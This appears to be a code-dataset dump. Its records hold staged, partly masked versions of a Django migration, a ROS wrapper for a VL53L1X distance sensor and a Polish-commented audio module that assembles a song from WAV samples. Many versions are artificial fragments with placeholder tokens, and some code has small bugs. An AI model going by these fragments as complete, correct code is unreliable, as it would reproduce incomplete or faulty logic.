]
|
normal
|
{
"blob_id": "84d9400dc4ee0bebce3f5f7da0bd77a280bb54a9",
"index": 8503,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('foodBookApp', '0027_remove_post_total_comments')]\n operations = [migrations.AlterField(model_name='post', name='likes',\n field=models.ManyToManyField(blank=True, related_name='like_post',\n to=settings.AUTH_USER_MODEL)), migrations.AlterField(model_name=\n 'post', name='privacy', field=models.CharField(choices=[('public',\n 'Public'), ('private', 'Private'), ('friends', 'Friends Only')],\n default='public', max_length=7)), migrations.AlterField(model_name=\n 'profile', name='privacy', field=models.CharField(choices=[(\n 'public', 'Public'), ('private', 'Private'), ('friends',\n 'Friends Only')], default='public', max_length=7))]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [migrations.swappable_dependency(settings.\n AUTH_USER_MODEL), ('foodBookApp', '0027_remove_post_total_comments')]\n operations = [migrations.AlterField(model_name='post', name='likes',\n field=models.ManyToManyField(blank=True, related_name='like_post',\n to=settings.AUTH_USER_MODEL)), migrations.AlterField(model_name=\n 'post', name='privacy', field=models.CharField(choices=[('public',\n 'Public'), ('private', 'Private'), ('friends', 'Friends Only')],\n default='public', max_length=7)), migrations.AlterField(model_name=\n 'profile', name='privacy', field=models.CharField(choices=[(\n 'public', 'Public'), ('private', 'Private'), ('friends',\n 'Friends Only')], default='public', max_length=7))]\n",
"step-5": "# Generated by Django 3.1.3 on 2020-11-27 02:17\n\nfrom django.conf import settings\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('foodBookApp', '0027_remove_post_total_comments'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='post',\n name='likes',\n field=models.ManyToManyField(blank=True, related_name='like_post', to=settings.AUTH_USER_MODEL),\n ),\n migrations.AlterField(\n model_name='post',\n name='privacy',\n field=models.CharField(choices=[('public', 'Public'), ('private', 'Private'), ('friends', 'Friends Only')], default='public', max_length=7),\n ),\n migrations.AlterField(\n model_name='profile',\n name='privacy',\n field=models.CharField(choices=[('public', 'Public'), ('private', 'Private'), ('friends', 'Friends Only')], default='public', max_length=7),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import VL53L1X
from sensor_msgs.msg import Range
class _VL53L1():
def __init__(self, address=0x29):
address = int(address, 16)
print("initialising sensor with address: {}".format(hex(address)))
try:
self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)
self.tof.open()
self.tof.start_ranging(0)
self.tof.set_timing(30000, 33)
except Exception as e:
print(e)
def set_range(self, rng):
if rng < 4 and rng >= 0:
self.tof.set_range()
else:
raise Exception("Invalid range: 1 - short, 2 - med, 3 - long")
def set_fov(self, mode):
if mode == "wide":
roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)
elif mode == "center":
roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)
elif mode == "top":
roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)
elif mode == "bottom":
roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)
elif mode == "left":
roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)
elif mode == "right":
roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)
else:
roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)
self.tof.set_user_roi(roi)
def read(self):
dist = self.tof.get_distance()
msg = Range()
msg.radiation_type = 1
msg.field_of_view = 27
msg.min_range = 0
msg.max_range = 400
msg.range = float(dist)
return msg
|
normal
|
{
"blob_id": "c6d9b971ab6919846807b740313d450d086ecc23",
"index": 7643,
"step-1": "<mask token>\n\n\nclass _VL53L1:\n <mask token>\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n <mask token>\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-2": "<mask token>\n\n\nclass _VL53L1:\n\n def __init__(self, address=41):\n address = int(address, 16)\n print('initialising sensor with address: {}'.format(hex(address)))\n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0)\n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n <mask token>\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-3": "<mask token>\n\n\nclass _VL53L1:\n\n def __init__(self, address=41):\n address = int(address, 16)\n print('initialising sensor with address: {}'.format(hex(address)))\n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0)\n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n\n def set_fov(self, mode):\n if mode == 'wide':\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n elif mode == 'center':\n roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)\n elif mode == 'top':\n roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)\n elif mode == 'bottom':\n roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)\n elif mode == 'left':\n roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)\n elif mode == 'right':\n roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)\n else:\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n self.tof.set_user_roi(roi)\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-4": "import VL53L1X\nfrom sensor_msgs.msg import Range\n\n\nclass _VL53L1:\n\n def __init__(self, address=41):\n address = int(address, 16)\n print('initialising sensor with address: {}'.format(hex(address)))\n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0)\n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception('Invalid range: 1 - short, 2 - med, 3 - long')\n\n def set_fov(self, mode):\n if mode == 'wide':\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n elif mode == 'center':\n roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)\n elif mode == 'top':\n roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)\n elif mode == 'bottom':\n roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)\n elif mode == 'left':\n roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)\n elif mode == 'right':\n roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)\n else:\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n self.tof.set_user_roi(roi)\n\n def read(self):\n dist = self.tof.get_distance()\n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n return msg\n",
"step-5": "import VL53L1X\n\nfrom sensor_msgs.msg import Range\n\nclass _VL53L1():\n\n def __init__(self, address=0x29):\n address = int(address, 16)\n print(\"initialising sensor with address: {}\".format(hex(address)))\n \n try:\n self.tof = VL53L1X.VL53L1X(i2c_bus=1, i2c_address=address)\n self.tof.open()\n self.tof.start_ranging(0) \n self.tof.set_timing(30000, 33)\n except Exception as e:\n print(e)\n\n def set_range(self, rng):\n if rng < 4 and rng >= 0:\n self.tof.set_range()\n else:\n raise Exception(\"Invalid range: 1 - short, 2 - med, 3 - long\")\n\n def set_fov(self, mode):\n\n if mode == \"wide\": \n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n\n elif mode == \"center\":\n roi = VL53L1X.VL53L1xUserRoi(6, 9, 9, 6)\n\n elif mode == \"top\":\n roi = VL53L1X.VL53L1xUserRoi(6, 15, 9, 12)\n\n elif mode == \"bottom\":\n roi = VL53L1X.VL53L1xUserRoi(6, 3, 9, 0)\n\n elif mode == \"left\":\n roi = VL53L1X.VL53L1xUserRoi(0, 9, 3, 6)\n\n elif mode == \"right\":\n roi = VL53L1X.VL53L1xUserRoi(12, 9, 15, 6)\n \n else:\n roi = VL53L1X.VL53L1xUserRoi(0, 15, 15, 0)\n\n self.tof.set_user_roi(roi)\n\n def read(self):\n\n dist = self.tof.get_distance()\n \n msg = Range()\n msg.radiation_type = 1\n msg.field_of_view = 27\n msg.min_range = 0\n msg.max_range = 400\n msg.range = float(dist)\n\n return msg ",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# -*- coding: utf-8 -*-
"""
Modul do zapisu piosenki (wczytywanie ustawien (defs.txt), tworzenie .wav,
"zglasnianie utworu")
"""
print("Laduje modul o nazwie: "+__name__)
import numpy as np
def wczytywanie_ustawien(plik_konfiguracyjny = "defs.txt"):
"""
wczytywanie pliku z ustawieniami (pliku defs.txt) do slownika
arg:
str: plik_konfiguracyjny - nazwa pliku konfiguracyjnego z podanymi
wartosciami parametrow (tempo itd.)
wyjscie:
dict: parametry - zapisane nazwy i wartosci uzywanych parametrow
"""
import re
import numpy as np
# wczytuje zawartosc pliku (bez pierwszej i ostatniej linijki, jeden wiersz
# wyjsciowej macierzy, zawiera nazwe parametru i jego wartosc, jako
# oddzielne elementy, zapisane jako stringi)
ustawienia = np.genfromtxt(plik_konfiguracyjny, dtype = str, \
skip_header=1, skip_footer=1, delimiter=":")
# tworze slownik, ktory bedzie przechowywal wartosci
parametry = {}
# pozbywam się "" z key
# jesli mamy 1 parametr (1 linijka w pliku, to ustawienia to zmienna o
# shape = (2,), wiec odwoluje sie bezposrednio do zmiennej ustawienia
if ustawienia.shape == (2,):
parametry[re.sub('"','',ustawienia[0])] = ustawienia[1]
# jak mamy wiecej parametrow odwoluje sie do kolejnych linijek macierzy
# ustawienia
else:
for l in ustawienia:
parametry[re.sub('"','',l[0])] = l[1]
# zamieniamy napisy na odpowiednie wartosci - kontroluje te parametry, wiec
# robie to recznie
try:
parametry['tryb'] = parametry['tryb'].strip() #tryb
# jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu
except KeyError:
print("Podaj tryb odczytu!")
try:
parametry['bpm'] = int(parametry['bpm']) # tempo
# jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu
except KeyError:
pass
try:
parametry['freq'] = int(parametry['freq']) # frekwencja wyjsciowego wav
# jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu
except KeyError:
pass
try:
parametry['loud'] = float(parametry['loud'] ) # glosnosc
# jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu
except KeyError:
pass
try:
# lista wag dla sampli
parametry['wages'] = [float(s) for s in parametry['wages'].split(",")]
# jak nie podano danego parametru to idz dalej, nie wyrzucaj bledu
except KeyError:
pass
return parametry
#b = wczytywanie_ustawien("defs.txt")
#zglasnianie utworu
def zmiana_glosnosci(utwor, procent = 0):
"""
zmienia glosnosc utworu (jego amplitudy)
arg:
numpy.ndarray (numpy.int16): utwor - dzwiek, ktory ma byc zglosniony
lub zciszony
float: procent - liczba obrazujaca zmiane glosnosci utworu, osiaga
wartosci od -1 do 1, dla 0 brak zmian, dla 1 - "100%
glosniej", dla -1 "100% ciszej"
wyjscie:
numpy.ndarray (numpy.int16): glosniejszy -sciszony lub zglosniony utwor
"""
if(-1 <= procent <= 1):
#ile razy mamy pomnozyc amplitude naszego dzwieku
mnoznik = 0
if( procent < 0 ):
mnoznik = 1 + procent
else:
# obliczamy najwyzsza amplitude w danym utworze i ona bedzie
# wyznaczac jak bardzo mozemy podglosnic
maks_ampli = 0
maks_ampli = max(abs(utwor))
mnoznik = 32767/maks_ampli # maksymalny mnoznik
# mnoznik minimalnie moze osiagnac wartosc 1, to co powyzej
# (mnoznik-1) mnozymy o procent zglosnienia
# i dodajemy do podstawy (czyli 1)
mnoznik = 1 + (mnoznik - 1)*procent
glosniej = mnoznik * utwor
#glosniej = np.array(glosniej, dtype=np.int16)
glosniej = glosniej.astype(np.int16)
return glosniej
else:
print("Podaj procent z zakresu -1 do 1")
#wierszyk1 = zmiana_glosnosci(wierszyk, b['loud'])
#wierszyk1
def tworzenie_piosenki(macierz_piosenki, czy_pelna = True, bpm = 120, \
freq = 44100, wages = None, loud = 0):
"""
glowna funkcja generujaca cala piosenke
arg:
numpy.ndarray (str: U2): macierz_piosenki - macierz zawierajaca
definicje kolejnych cwiercnut (co ma byc grane
w danej cwiercnucie)
bool: czy_pelna - zmienna sprawdzajaca czy macierz_piosenki jest
zapisana (nie jest, gdy tracki mialy nieodpowiednia
liczbe wierszy lub kolumn)
int: bpm - tempo piosenki w jednostce bpm
int: freq - ilosc probek w jednej sekundzie
list (float): wages - wagi kolejnych sampli (jakie znaczenie ma miec 1
probka, 2 etc.)
float: loud - procent glosnosci, 0 - tak jak oryginalne probki, 1 - na
maxa, -1 - sciszamy na maxa
wyjscie:
numpy.ndarray (numpy.int16): gotowy utwór
"""
# macierz piosenki byla pusta, piosenka nie zostala utworzona
if(czy_pelna == False):
print("Nie utworzono piosenki")
return None
else:
import numpy as np
import scipy.io.wavfile
t_cwiercnuty = 60 / bpm # czas trwania jednej cwiercnuty (zalezy od
#tempa)
ile_cwiercnut = macierz_piosenki.shape[0] # ilosc cwiercnut
kanaly = macierz_piosenki.shape[1] # ilosc uzywanych sampli
frekw = freq
czas_utworu = ile_cwiercnut*t_cwiercnuty
# ile elementow bedzie w nowym utworze
ilosc_probek = int(frekw*czas_utworu)
# bedziemy tylko raz wczytywac zawartosc sampleXY.wav, wiec potrzebuje
# unikalne numery sampli
rozne_sample = np.unique(macierz_piosenki) # bierze lacznie z "--"
# w slownikach zapiszemy parametry tych sampli
# slownik z wartosciami danego sampla (tj. macierze numpy-owe z
# amplitudami)
sample_co = {}
sample_frekw = {} # slownik z ich frekwencjami
sample_dl = {} # slownik z ich dlugosciami
#wczytujemy te sample
# w iteratorze bierzemy napisy "01" "02" "--" itd. stringi!!!
for ktory_sampel in rozne_sample:
if(ktory_sampel != '--'):
# tworzymy napis z nazwa pliku sampla, np. "sample01.wav"
plik = ''.join(['sample',ktory_sampel,'.wav'])
# wczytujemy zawartosc i frekwencje danego sampla do
# odpowiednio nazwanego elementu w slowniku sample_co i
# sample_frekw
sample_frekw[ktory_sampel], sample_co[ktory_sampel] = \
scipy.io.wavfile.read(plik)
# tworzymy mono z naszego sampla
sample_co[ktory_sampel] = np.mean(sample_co[ktory_sampel],\
axis=1)/32767
# normalizujemy te wartosci
sample_co[ktory_sampel] = np.int16(sample_co[ktory_sampel]/ \
max(np.abs(sample_co[ktory_sampel])) * 32767)
# zapisujemy dlugosc sampli, czyli ilosc probek
# ( = czas_trwania*frekwencja)
sample_dl[ktory_sampel] = sample_co[ktory_sampel].shape[0]
else: # to samo robimy dla "--" recznie ustawiamy
# robimy cisze, gdy --
sample_co[ktory_sampel] = np.zeros((1,), dtype=np.int16)
sample_frekw[ktory_sampel] = frekw # taka sama jak domyslna
sample_dl[ktory_sampel] = 0 # zakladamy czas 0 sekund
if wages is None:
wages = np.ones((1,kanaly))
else:
# zeby mialo wymiar (1,kanaly), a nie (kanaly,)
wages = np.array(wages).reshape(1,kanaly)
# definicja nowego utworu
T = np.linspace(0, czas_utworu, ilosc_probek)
for wiersz in range(0, ile_cwiercnut):
sample = [] # wczytamy sample z danej cwiecnuty
dlugosci = [] # tu zapiszemy ich dlugosci w tej cwiercnucie
for i in range(0, kanaly):
sampus = macierz_piosenki[wiersz,i]
sample.append(sample_co[sampus])
dlugosci.append(sample_dl[sampus])
# bierzemy najdluzszy sample i w calosci bedziemy go odtwarzac;
# reszte zatem tez w calosci odtworzymy, a gdy sie skoncza damy
# cisze (zera)
maksik = max(dlugosci)
# mamy tutaj macierz 4 na max dlugosc, przygotowana do zlaczenia
# potem tych dzwiekow w jeden
pusty = np.int16(np.zeros((len(sample), maksik)))
# dodajemy nasze dzwieki do tej pustej
for k in range(0, kanaly):
pusty[k][0:dlugosci[k]] = sample[k]
# mnozymy kolejne elementy wektora pusty (czyli sample) przez
# wagi i sumujemy
cwiercnuta = np.dot(wages, pusty)
#otrzymamy wymiar (1, x), a chcemy (x,), wiec bierzemy pierwszy
# element
cwiercnuta = cwiercnuta[0]
# poczatek biezacej cwiercnuty
poczatek_cwiercnuty = int(wiersz*t_cwiercnuty*frekw)
# jesli dodanie ostatnich cwiercnut bedzie wiazalo sie z
# przekroczeniem dlugosci tworzonego utworu, obcinamy ostatnie
# dzwieki, tak by zmiescic sie w tej dlugosci
if (poczatek_cwiercnuty + maksik) > ilosc_probek:
T[poczatek_cwiercnuty:(poczatek_cwiercnuty + maksik)]=\
cwiercnuta[0:len(T[poczatek_cwiercnuty:(poczatek_cwiercnuty +\
maksik)])]
else:
T[poczatek_cwiercnuty:(poczatek_cwiercnuty + maksik)] += \
cwiercnuta
T= np.array(T, dtype=np.int16)
#ustalamy glosnosc utworu
T = zmiana_glosnosci(T, loud)
return T
#pios, k = wczytywanie_sciezek(a)
#wierszyk = tworzenie_piosenki(pios, k, bpm = b['bpm'], freq = b['freq'], \
#wages = b['wages'])
#wierszyk = tworzenie_piosenki(pios, k, **b)
#wierszyk
|
normal
|
{
"blob_id": "8220a6d33cda5861e74d6236757abbc81685a998",
"index": 6369,
"step-1": "<mask token>\n\n\ndef wczytywanie_ustawien(plik_konfiguracyjny='defs.txt'):\n \"\"\" \n wczytywanie pliku z ustawieniami (pliku defs.txt) do slownika\n \n arg:\n str: plik_konfiguracyjny - nazwa pliku konfiguracyjnego z podanymi \n wartosciami parametrow (tempo itd.)\n \n wyjscie:\n dict: parametry - zapisane nazwy i wartosci uzywanych parametrow\n \n \"\"\"\n import re\n import numpy as np\n ustawienia = np.genfromtxt(plik_konfiguracyjny, dtype=str, skip_header=\n 1, skip_footer=1, delimiter=':')\n parametry = {}\n if ustawienia.shape == (2,):\n parametry[re.sub('\"', '', ustawienia[0])] = ustawienia[1]\n else:\n for l in ustawienia:\n parametry[re.sub('\"', '', l[0])] = l[1]\n try:\n parametry['tryb'] = parametry['tryb'].strip()\n except KeyError:\n print('Podaj tryb odczytu!')\n try:\n parametry['bpm'] = int(parametry['bpm'])\n except KeyError:\n pass\n try:\n parametry['freq'] = int(parametry['freq'])\n except KeyError:\n pass\n try:\n parametry['loud'] = float(parametry['loud'])\n except KeyError:\n pass\n try:\n parametry['wages'] = [float(s) for s in parametry['wages'].split(',')]\n except KeyError:\n pass\n return parametry\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef wczytywanie_ustawien(plik_konfiguracyjny='defs.txt'):\n \"\"\" \n wczytywanie pliku z ustawieniami (pliku defs.txt) do slownika\n \n arg:\n str: plik_konfiguracyjny - nazwa pliku konfiguracyjnego z podanymi \n wartosciami parametrow (tempo itd.)\n \n wyjscie:\n dict: parametry - zapisane nazwy i wartosci uzywanych parametrow\n \n \"\"\"\n import re\n import numpy as np\n ustawienia = np.genfromtxt(plik_konfiguracyjny, dtype=str, skip_header=\n 1, skip_footer=1, delimiter=':')\n parametry = {}\n if ustawienia.shape == (2,):\n parametry[re.sub('\"', '', ustawienia[0])] = ustawienia[1]\n else:\n for l in ustawienia:\n parametry[re.sub('\"', '', l[0])] = l[1]\n try:\n parametry['tryb'] = parametry['tryb'].strip()\n except KeyError:\n print('Podaj tryb odczytu!')\n try:\n parametry['bpm'] = int(parametry['bpm'])\n except KeyError:\n pass\n try:\n parametry['freq'] = int(parametry['freq'])\n except KeyError:\n pass\n try:\n parametry['loud'] = float(parametry['loud'])\n except KeyError:\n pass\n try:\n parametry['wages'] = [float(s) for s in parametry['wages'].split(',')]\n except KeyError:\n pass\n return parametry\n\n\ndef zmiana_glosnosci(utwor, procent=0):\n \"\"\"\n zmienia glosnosc utworu (jego amplitudy)\n \n arg:\n numpy.ndarray (numpy.int16): utwor - dzwiek, ktory ma byc zglosniony \n lub zciszony\n \n float: procent - liczba obrazujaca zmiane glosnosci utworu, osiaga \n wartosci od -1 do 1, dla 0 brak zmian, dla 1 - \"100% \n glosniej\", dla -1 \"100% ciszej\"\n \n wyjscie:\n numpy.ndarray (numpy.int16): glosniejszy -sciszony lub zglosniony utwor\n \"\"\"\n if -1 <= procent <= 1:\n mnoznik = 0\n if procent < 0:\n mnoznik = 1 + procent\n else:\n maks_ampli = 0\n maks_ampli = max(abs(utwor))\n mnoznik = 32767 / maks_ampli\n mnoznik = 1 + (mnoznik - 1) * procent\n glosniej = mnoznik * utwor\n glosniej = glosniej.astype(np.int16)\n return glosniej\n else:\n print('Podaj procent z zakresu -1 do 1')\n\n\ndef tworzenie_piosenki(macierz_piosenki, czy_pelna=True, bpm=120, freq=\n 44100, wages=None, loud=0):\n \"\"\"\n glowna funkcja generujaca cala piosenke\n \n arg:\n numpy.ndarray (str: U2): macierz_piosenki - macierz zawierajaca \n definicje kolejnych cwiercnut (co ma byc grane \n w danej cwiercnucie)\n \n bool: czy_pelna - zmienna sprawdzajaca czy macierz_piosenki jest \n zapisana (nie jest, gdy tracki mialy nieodpowiednia \n liczbe wierszy lub kolumn)\n \n int: bpm - tempo piosenki w jednostce bpm\n \n int: freq - ilosc probek w jednej sekundzie\n \n list (float): wages - wagi kolejnych sampli (jakie znaczenie ma miec 1 \n probka, 2 etc.)\n \n float: loud - procent glosnosci, 0 - tak jak oryginalne probki, 1 - na \n maxa, -1 - sciszamy na maxa\n \n wyjscie:\n numpy.ndarray (numpy.int16): gotowy utwór\n \n \"\"\"\n if czy_pelna == False:\n print('Nie utworzono piosenki')\n return None\n else:\n import numpy as np\n import scipy.io.wavfile\n t_cwiercnuty = 60 / bpm\n ile_cwiercnut = macierz_piosenki.shape[0]\n kanaly = macierz_piosenki.shape[1]\n frekw = freq\n czas_utworu = ile_cwiercnut * t_cwiercnuty\n ilosc_probek = int(frekw * czas_utworu)\n rozne_sample = np.unique(macierz_piosenki)\n sample_co = {}\n sample_frekw = {}\n sample_dl = {}\n for ktory_sampel in rozne_sample:\n if ktory_sampel != '--':\n plik = ''.join(['sample', ktory_sampel, '.wav'])\n sample_frekw[ktory_sampel], sample_co[ktory_sampel\n ] = scipy.io.wavfile.read(plik)\n sample_co[ktory_sampel] = np.mean(sample_co[ktory_sampel],\n axis=1) / 32767\n sample_co[ktory_sampel] = np.int16(sample_co[ktory_sampel] /\n max(np.abs(sample_co[ktory_sampel])) * 32767)\n sample_dl[ktory_sampel] = sample_co[ktory_sampel].shape[0]\n else:\n sample_co[ktory_sampel] = np.zeros((1,), dtype=np.int16)\n sample_frekw[ktory_sampel] = frekw\n sample_dl[ktory_sampel] = 0\n if wages is None:\n wages = np.ones((1, kanaly))\n else:\n wages = np.array(wages).reshape(1, kanaly)\n T = np.linspace(0, czas_utworu, ilosc_probek)\n for wiersz in range(0, ile_cwiercnut):\n sample = []\n dlugosci = []\n for i in range(0, kanaly):\n sampus = macierz_piosenki[wiersz, i]\n sample.append(sample_co[sampus])\n dlugosci.append(sample_dl[sampus])\n maksik = max(dlugosci)\n pusty = np.int16(np.zeros((len(sample), maksik)))\n for k in range(0, kanaly):\n pusty[k][0:dlugosci[k]] = sample[k]\n cwiercnuta = np.dot(wages, pusty)\n cwiercnuta = cwiercnuta[0]\n poczatek_cwiercnuty = int(wiersz * t_cwiercnuty * frekw)\n if poczatek_cwiercnuty + maksik > ilosc_probek:\n T[poczatek_cwiercnuty:poczatek_cwiercnuty + maksik\n ] = cwiercnuta[0:len(T[poczatek_cwiercnuty:\n poczatek_cwiercnuty + maksik])]\n else:\n T[poczatek_cwiercnuty:poczatek_cwiercnuty + maksik\n ] += cwiercnuta\n T = np.array(T, dtype=np.int16)\n T = zmiana_glosnosci(T, loud)\n return T\n",
"step-3": "<mask token>\nprint('Laduje modul o nazwie: ' + __name__)\n<mask token>\n\n\ndef wczytywanie_ustawien(plik_konfiguracyjny='defs.txt'):\n \"\"\" \n wczytywanie pliku z ustawieniami (pliku defs.txt) do slownika\n \n arg:\n str: plik_konfiguracyjny - nazwa pliku konfiguracyjnego z podanymi \n wartosciami parametrow (tempo itd.)\n \n wyjscie:\n dict: parametry - zapisane nazwy i wartosci uzywanych parametrow\n \n \"\"\"\n import re\n import numpy as np\n ustawienia = np.genfromtxt(plik_konfiguracyjny, dtype=str, skip_header=\n 1, skip_footer=1, delimiter=':')\n parametry = {}\n if ustawienia.shape == (2,):\n parametry[re.sub('\"', '', ustawienia[0])] = ustawienia[1]\n else:\n for l in ustawienia:\n parametry[re.sub('\"', '', l[0])] = l[1]\n try:\n parametry['tryb'] = parametry['tryb'].strip()\n except KeyError:\n print('Podaj tryb odczytu!')\n try:\n parametry['bpm'] = int(parametry['bpm'])\n except KeyError:\n pass\n try:\n parametry['freq'] = int(parametry['freq'])\n except KeyError:\n pass\n try:\n parametry['loud'] = float(parametry['loud'])\n except KeyError:\n pass\n try:\n parametry['wages'] = [float(s) for s in parametry['wages'].split(',')]\n except KeyError:\n pass\n return parametry\n\n\ndef zmiana_glosnosci(utwor, procent=0):\n \"\"\"\n zmienia glosnosc utworu (jego amplitudy)\n \n arg:\n numpy.ndarray (numpy.int16): utwor - dzwiek, ktory ma byc zglosniony \n lub zciszony\n \n float: procent - liczba obrazujaca zmiane glosnosci utworu, osiaga \n wartosci od -1 do 1, dla 0 brak zmian, dla 1 - \"100% \n glosniej\", dla -1 \"100% ciszej\"\n \n wyjscie:\n numpy.ndarray (numpy.int16): glosniejszy -sciszony lub zglosniony utwor\n \"\"\"\n if -1 <= procent <= 1:\n mnoznik = 0\n if procent < 0:\n mnoznik = 1 + procent\n else:\n maks_ampli = 0\n maks_ampli = max(abs(utwor))\n mnoznik = 32767 / maks_ampli\n mnoznik = 1 + (mnoznik - 1) * procent\n glosniej = mnoznik * utwor\n glosniej = glosniej.astype(np.int16)\n return glosniej\n else:\n print('Podaj procent z zakresu -1 do 1')\n\n\ndef tworzenie_piosenki(macierz_piosenki, czy_pelna=True, bpm=120, freq=\n 44100, wages=None, loud=0):\n \"\"\"\n glowna funkcja generujaca cala piosenke\n \n arg:\n numpy.ndarray (str: U2): macierz_piosenki - macierz zawierajaca \n definicje kolejnych cwiercnut (co ma byc grane \n w danej cwiercnucie)\n \n bool: czy_pelna - zmienna sprawdzajaca czy macierz_piosenki jest \n zapisana (nie jest, gdy tracki mialy nieodpowiednia \n liczbe wierszy lub kolumn)\n \n int: bpm - tempo piosenki w jednostce bpm\n \n int: freq - ilosc probek w jednej sekundzie\n \n list (float): wages - wagi kolejnych sampli (jakie znaczenie ma miec 1 \n probka, 2 etc.)\n \n float: loud - procent glosnosci, 0 - tak jak oryginalne probki, 1 - na \n maxa, -1 - sciszamy na maxa\n \n wyjscie:\n numpy.ndarray (numpy.int16): gotowy utwór\n \n \"\"\"\n if czy_pelna == False:\n print('Nie utworzono piosenki')\n return None\n else:\n import numpy as np\n import scipy.io.wavfile\n t_cwiercnuty = 60 / bpm\n ile_cwiercnut = macierz_piosenki.shape[0]\n kanaly = macierz_piosenki.shape[1]\n frekw = freq\n czas_utworu = ile_cwiercnut * t_cwiercnuty\n ilosc_probek = int(frekw * czas_utworu)\n rozne_sample = np.unique(macierz_piosenki)\n sample_co = {}\n sample_frekw = {}\n sample_dl = {}\n for ktory_sampel in rozne_sample:\n if ktory_sampel != '--':\n plik = ''.join(['sample', ktory_sampel, '.wav'])\n sample_frekw[ktory_sampel], sample_co[ktory_sampel\n ] = scipy.io.wavfile.read(plik)\n sample_co[ktory_sampel] = np.mean(sample_co[ktory_sampel],\n axis=1) / 32767\n sample_co[ktory_sampel] = np.int16(sample_co[ktory_sampel] /\n max(np.abs(sample_co[ktory_sampel])) * 32767)\n sample_dl[ktory_sampel] = sample_co[ktory_sampel].shape[0]\n else:\n sample_co[ktory_sampel] = np.zeros((1,), dtype=np.int16)\n sample_frekw[ktory_sampel] = frekw\n sample_dl[ktory_sampel] = 0\n if wages is None:\n wages = np.ones((1, kanaly))\n else:\n wages = np.array(wages).reshape(1, kanaly)\n T = np.linspace(0, czas_utworu, ilosc_probek)\n for wiersz in range(0, ile_cwiercnut):\n sample = []\n dlugosci = []\n for i in range(0, kanaly):\n sampus = macierz_piosenki[wiersz, i]\n sample.append(sample_co[sampus])\n dlugosci.append(sample_dl[sampus])\n maksik = max(dlugosci)\n pusty = np.int16(np.zeros((len(sample), maksik)))\n for k in range(0, kanaly):\n pusty[k][0:dlugosci[k]] = sample[k]\n cwiercnuta = np.dot(wages, pusty)\n cwiercnuta = cwiercnuta[0]\n poczatek_cwiercnuty = int(wiersz * t_cwiercnuty * frekw)\n if poczatek_cwiercnuty + maksik > ilosc_probek:\n T[poczatek_cwiercnuty:poczatek_cwiercnuty + maksik\n ] = cwiercnuta[0:len(T[poczatek_cwiercnuty:\n poczatek_cwiercnuty + maksik])]\n 